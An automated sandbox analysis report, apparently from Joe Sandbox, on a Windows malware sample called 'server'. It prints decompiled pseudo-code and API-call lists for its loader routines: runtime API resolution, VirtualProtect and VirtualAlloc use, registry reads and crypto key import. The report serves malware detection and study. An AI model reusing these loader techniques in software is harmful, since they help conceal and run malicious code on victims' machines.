            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_850000_server.jbxd
            Yara matches
            Similarity
            • API ID: CreateFirstModule32SnapshotToolhelp32
            • String ID:
            • API String ID: 3833638111-0
            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
            • Instruction ID: e7d13428d0550b5d6a0b6d1bd27d335dff14fef4c3107471bd5d0be5079fa796
            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
            • Instruction Fuzzy Hash: 5CF06232100B15ABD7202AF9A89DB6B76E8FF49726F100528EA52D24C0DA74E9494661
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E472F Relevance: 3.0, APIs: 2, Instructions: 40COMMON
            Download Yara Rule
            C-Code - Quality: 37%
            			E007E472F(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E007E33DC(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E007E61DA(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









            0x007e4734
            0x007e473f
            0x007e4741
            0x007e4747
            0x007e4749
            0x007e474e
            0x007e4757
            0x007e475b
            0x007e4764
            0x007e4768
            0x007e4777
            0x007e476a
            0x007e476b
            0x007e4770
            0x007e4770
            0x007e4768
            0x007e475b
            0x007e4780

            APIs
            • GetComputerNameExA.KERNELBASE(00000003,00000000,007E3DCD,00000000,00000000,?,7491C740,007E3DCD), ref: 007E4747
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            • GetComputerNameExA.KERNELBASE(00000003,00000000,007E3DCD,007E3DCE,?,7491C740,007E3DCD), ref: 007E4764
              • Part of subcall function 007E61DA: RtlFreeHeap.NTDLL(00000000,00000000,007E6383,00000000,?,00000000,00000000), ref: 007E61E6
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: ComputerHeapName$AllocateFree
            • String ID:
            • API String ID: 187446995-0
            • Opcode ID: 85be9cdc9d07a4aea8b344a8cd8ea4f12998df34b2f38dee539610f56181a08a
            • Instruction ID: 608b527f5f4d594661652dcded30fb49563447dfb81556dd073594150ec46e5e
            • Opcode Fuzzy Hash: 85be9cdc9d07a4aea8b344a8cd8ea4f12998df34b2f38dee539610f56181a08a
            • Instruction Fuzzy Hash: 93F0B43660119AFAEB11D6ABCC49EAF3AACEBC9745F500055E904D3140EB74DE0186B0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E5006 Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E007E5006(signed int __edx, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				signed int _t10;

				_t10 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x7ea2d8 = _t3;
				if(_t3 == 0) {
					_t8 = 8;
					return _t8;
				}
				 *0x7ea1c8 = GetTickCount();
				_t5 = E007E54D8(_a4);
				if(_t5 == 0) {
					_t5 = E007E213E(_t9, _a4); // executed
					if(_t5 == 0) {
						if(E007E6392(_t9) != 0) {
							 *0x7ea300 = 1; // executed
						}
						_t7 = E007E2523(_t10); // executed
						return _t7;
					}
				}
				return _t5;
			}









            0x007e5006
            0x007e500f
            0x007e5015
            0x007e501c
            0x007e5020
            0x00000000
            0x007e5020
            0x007e502d
            0x007e5032
            0x007e5039
            0x007e503f
            0x007e5046
            0x007e504f
            0x007e5051
            0x007e5051
            0x007e505b
            0x00000000
            0x007e505b
            0x007e5046
            0x007e5060

            APIs
            • HeapCreate.KERNELBASE(00000000,00400000,00000000,007E107E,?), ref: 007E500F
            • GetTickCount.KERNEL32 ref: 007E5023
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: CountCreateHeapTick
            • String ID:
            • API String ID: 2177101570-0
            • Opcode ID: e9454b91b76541c69d16ff5058a30bb5007997bc0d93a932abc896c05ccb9819
            • Instruction ID: 41791b611b9b4f7a92792d27ddc289bec8ab571b2653eee1b520c6bf93a85af8
            • Opcode Fuzzy Hash: e9454b91b76541c69d16ff5058a30bb5007997bc0d93a932abc896c05ccb9819
            • Instruction Fuzzy Hash: 7BF02B31243BC9E9DB612B339C9970536946F5C708F50C024F901D8092EB7CD8009A29
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00780E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
            Download Yara Rule
            APIs
            • SetErrorMode.KERNELBASE(00000400,?,?,00780223,?,?), ref: 00780E19
            • SetErrorMode.KERNELBASE(00000000,?,?,00780223,?,?), ref: 00780E1E
            Memory Dump Source
            • Source File: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_780000_server.jbxd
            Yara matches
            Similarity
            • API ID: ErrorMode
            • String ID:
            • API String ID: 2340568224-0
            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
            • Instruction ID: c37cf524c63f5757edd935c017db940ef546b67fe649cc31a07347fd0354d86c
            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
            • Instruction Fuzzy Hash: 77D0123114512877D7403A94DC09BCE7B1CDF05B62F008411FB0DD9080C774994047E5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00410A56 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
            Download Yara Rule
            APIs
            • RtlAllocateHeap.NTDLL(00000008,?), ref: 00410A99
            Memory Dump Source
            • Source File: 00000000.00000002.509538367.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: ccc9b60b2535d5223f35addaaa1f78a54de07b48145c451ca91b1a431c6b3d8d
            • Instruction ID: ce16d96dba39b34238c0f814864b91e47e23c4911384a1467efd66f2d7e9dac0
            • Opcode Fuzzy Hash: ccc9b60b2535d5223f35addaaa1f78a54de07b48145c451ca91b1a431c6b3d8d
            • Instruction Fuzzy Hash: 9E01B1322013159FEB289F75DC44BA737A4AFA17E0F05852BE8559A6D0DBB89CC0C798
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E2839 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
            Download Yara Rule
            C-Code - Quality: 34%
            			E007E2839(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x7ea348; // 0x272d5a8
				_t4 = _t15 + 0x7eb3e8; // 0x2f18990
				_t20 = _t4;
				_t6 = _t15 + 0x7eb174; // 0x650047
				_t17 = E007E790B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E007E661C(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










            0x007e2843
            0x007e284a
            0x007e284b
            0x007e284c
            0x007e284d
            0x007e2853
            0x007e2858
            0x007e2858
            0x007e2862
            0x007e2874
            0x007e287b
            0x007e28a9
            0x007e287d
            0x007e287f
            0x007e2884
            0x007e28a6
            0x007e2886
            0x007e2889
            0x007e2890
            0x007e2895
            0x007e2897
            0x007e2897
            0x007e289c
            0x007e289c
            0x007e2884
            0x007e28b0

            APIs
              • Part of subcall function 007E790B: SysFreeString.OLEAUT32(?), ref: 007E79EA
              • Part of subcall function 007E661C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,007E4B72,004F0053,00000000,?), ref: 007E6625
              • Part of subcall function 007E661C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,007E4B72,004F0053,00000000,?), ref: 007E664F
              • Part of subcall function 007E661C: memset.NTDLL ref: 007E6663
            • SysFreeString.OLEAUT32(00000000), ref: 007E289C
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: FreeString$lstrlenmemcpymemset
            • String ID:
            • API String ID: 397948122-0
            • Opcode ID: 03ba727db47d007036e32b526c503e793e63825ed5b6c53d160d84e9f7a5b7b7
            • Instruction ID: ab93d2f09fe27ef2caad449ede85151cca821fcd34be4935ec476d1257a9ee8d
            • Opcode Fuzzy Hash: 03ba727db47d007036e32b526c503e793e63825ed5b6c53d160d84e9f7a5b7b7
            • Instruction Fuzzy Hash: AF01B172501159FFDB819FAACC44DABBBB8FF0C350F004525E902E7062E7749912C790
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401D3C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
            Download Yara Rule
            C-Code - Quality: 37%
            			E00401D3C(void* __eax, intOrPtr _a4) {

				 *0x404190 =  *0x404190 & 0x00000000;
				_push(0);
				_push(0x40418c);
				_push(1);
				_push(_a4);
				 *0x404188 = 0xc; // executed
				L00401682(); // executed
				return __eax;
			}



            0x00401d3c
            0x00401d43
            0x00401d45
            0x00401d4a
            0x00401d4c
            0x00401d50
            0x00401d5a
            0x00401d5f

            APIs
            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004013CC,00000001,0040418C,00000000), ref: 00401D5A
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: DescriptorSecurity$ConvertString
            • String ID:
            • API String ID: 3907675253-0
            • Opcode ID: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
            • Instruction ID: 8b1a9882f0f7b6f5a619b3d6300b2bdd32795284b236dc0e31706888a106ff8d
            • Opcode Fuzzy Hash: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
            • Instruction Fuzzy Hash: AFC04CF4140300B7E620AB409D5AF057A5577A4715F61062DFB04391E1C3F91094952D
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004012E6 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E004012E6(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x404160, 0, _a4); // executed
				return _t2;
			}




            0x004012f2
            0x004012f8

            APIs
            • RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
            • Instruction ID: e72f98105ba7c706faca8ef9926cddb4ff6cd2f9e0c1ce1923eff6ceed1ee1be
            • Opcode Fuzzy Hash: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
            • Instruction Fuzzy Hash: 92B012B1100100ABCA118F11EF08F06BE31B7E4701F004030B3042407482314C20FB1D
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401BA9 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00401BA9(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x404160, 0, _a4); // executed
				return _t2;
			}




            0x00401bb5
            0x00401bbb

            APIs
            • RtlFreeHeap.NTDLL(00000000,00000030,004017ED,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,00401A66), ref: 00401BB5
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0
            • Opcode ID: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
            • Instruction ID: ce698fd0423bda5088509b7a42681047dd9c8e559710f82c1ef419a06116bbed
            • Opcode Fuzzy Hash: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
            • Instruction Fuzzy Hash: 8AB01271000100BBCA118F10EF08F067F21B7E4701F008030B3046407482314D60FB0C
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E61DA Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E007E61DA(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x7ea2d8, 0, _a4); // executed
				return _t2;
			}




            0x007e61e6
            0x007e61ec

            APIs
            • RtlFreeHeap.NTDLL(00000000,00000000,007E6383,00000000,?,00000000,00000000), ref: 007E61E6
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0
            • Opcode ID: 1c06d3a84757d95063294c339fcff09ce9d54f5248b22848748fc867dfd4ebea
            • Instruction ID: fd6f9795cf12ba65f9eacfdaa518f291d152321e6d326c6442fe4229195918ad
            • Opcode Fuzzy Hash: 1c06d3a84757d95063294c339fcff09ce9d54f5248b22848748fc867dfd4ebea
            • Instruction Fuzzy Hash: 94B01273101240FBCB114B01DE44F057B21B7D8700F00C010B3041807082361420FB1E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004012FB Relevance: 1.3, APIs: 1, Instructions: 70COMMON
            Download Yara Rule
            C-Code - Quality: 86%
            			E004012FB(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				void* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x404180;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4);
				_t18 = E00401202( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4), _t16 + 0xbce8a57d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E00401BC4(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E00401000(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E004014CF(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E00401BA9(_t42);
					L8:
					return _t29;
				}
			}














            0x00401303
            0x00401305
            0x00401321
            0x00401332
            0x00401339
            0x00401397
            0x00000000
            0x0040133b
            0x0040133b
            0x00401345
            0x00401349
            0x0040134e
            0x00401351
            0x00401356
            0x0040135a
            0x0040135f
            0x00401364
            0x00401368
            0x0040136d
            0x0040136e
            0x00401372
            0x00401377
            0x0040137f
            0x0040137f
            0x00401377
            0x00401368
            0x0040135a
            0x00401381
            0x0040138a
            0x0040138e
            0x00401398
            0x0040139e
            0x0040139e

            APIs
              • Part of subcall function 00401202: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401248
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401274
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
              • Part of subcall function 00401000: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
              • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
              • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
              • Part of subcall function 004014CF: GetLastError.KERNEL32 ref: 00401583
            • GetLastError.KERNEL32(?,?), ref: 00401379
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
            • String ID:
            • API String ID: 3135819546-0
            • Opcode ID: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
            • Instruction ID: 9c7335bcc5d41c3ee7976e84fb0b4f56712358cbe666051dfec51b4dde3629c0
            • Opcode Fuzzy Hash: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
            • Instruction Fuzzy Hash: 8B11E976600301ABD711ABA68C85DAB77BCAF98318704017EFD01B7A91EA74ED068798
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0085558E Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
            Download Yara Rule
            APIs
            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008555DF
            Memory Dump Source
            • Source File: 00000000.00000002.509856527.0000000000850000.00000040.00000020.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_850000_server.jbxd
            Yara matches
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
            • Instruction ID: a69ea9c291d3d813d51fae29e77659cabb4e4bf7d9fd4ee925d7005a7277cd23
            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
            • Instruction Fuzzy Hash: 72112B79A00208EFDB01DF98C985E99BBF5EF08351F4580A4F9489B362D371EA50DB80
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E33F1 Relevance: 1.3, APIs: 1, Instructions: 43memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E007E33F1(intOrPtr* __edi, void* _a4, char _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E007E58BD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x7ea2d8, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E007E2839(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}








            0x007e33f1
            0x007e33f9
            0x007e3410
            0x007e342b
            0x007e342f
            0x007e3434
            0x007e3436
            0x007e3448
            0x007e3454
            0x007e3438
            0x007e3438
            0x007e343d
            0x007e3442
            0x007e3442
            0x007e3436
            0x007e345a
            0x007e345e
            0x007e345e
            0x007e3405
            0x007e340a
            0x007e340e
            0x00000000
            0x00000000
            0x00000000

            APIs
              • Part of subcall function 007E2839: SysFreeString.OLEAUT32(00000000), ref: 007E289C
            • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74D0F710,?,00000000,?,00000000,?,007E528E,?,004F0053,02F19218,00000000,?), ref: 007E3454
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Free$HeapString
            • String ID:
            • API String ID: 3806048269-0
            • Opcode ID: 3e36bdb33abb547209dab0161bd40e5a39bb24155bf4c00c73e55b1e290f2918
            • Instruction ID: 150c741681032f8460fd76da3174000765ade0e393363b9734e548f0d97d8176
            • Opcode Fuzzy Hash: 3e36bdb33abb547209dab0161bd40e5a39bb24155bf4c00c73e55b1e290f2918
            • Instruction Fuzzy Hash: 47012C32502599FBDB239F55CC05EEA3BA9EF48750F048025FE059B161D7359A60DB90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E5063 Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
            Download Yara Rule
            C-Code - Quality: 75%
            			E007E5063(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E007E1508( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E007E33DC(_a8 + _a8);
					if(_t21 != 0) {
						E007E22EA(_a4, _t21, _t23);
					}
					E007E61DA(_a4);
				}
				return _t21;
			}





            0x007e506b
            0x007e5072
            0x007e5074
            0x007e5083
            0x007e508a
            0x007e5099
            0x007e509d
            0x007e50a4
            0x007e50a4
            0x007e50ac
            0x007e50b1
            0x007e50b6

            APIs
            • lstrlen.KERNEL32(00000000,00000000,007E3ECE,00000000,?,007E66D9,00000000,007E3ECE,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E5074
              • Part of subcall function 007E1508: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,007E5088,00000001,007E3ECE,00000000), ref: 007E1540
              • Part of subcall function 007E1508: memcpy.NTDLL(007E5088,007E3ECE,00000010,?,?,?,007E5088,00000001,007E3ECE,00000000,?,007E66D9,00000000,007E3ECE,?,7491C740), ref: 007E1559
              • Part of subcall function 007E1508: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 007E1582
              • Part of subcall function 007E1508: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 007E159A
              • Part of subcall function 007E1508: memcpy.NTDLL(00000000,7491C740,02F19600,00000010), ref: 007E15EC
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
            • String ID:
            • API String ID: 894908221-0
            • Opcode ID: 580b489009f49105a7caaa96e082652e787896522a1869db6ff309fb9271f477
            • Instruction ID: 8636b0ed50a5e4f6af20a2085f6f84a3c7801f9d0ec56b3e320aa5827fa71e84
            • Opcode Fuzzy Hash: 580b489009f49105a7caaa96e082652e787896522a1869db6ff309fb9271f477
            • Instruction Fuzzy Hash: 57F0BE3610204CBBCF12AF66CC04CDA3BADEF8C3A4B008022FE08CA011DA35DA519BA0
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Function 00781C58 Relevance: 21.2, APIs: 14, Instructions: 160threadsleepnativeCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00781FCF: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00781C63), ref: 00781FDE
              • Part of subcall function 00781FCF: GetVersion.KERNEL32(?,00781C63), ref: 00781FED
              • Part of subcall function 00781FCF: GetCurrentProcessId.KERNEL32(?,00781C63), ref: 00782009
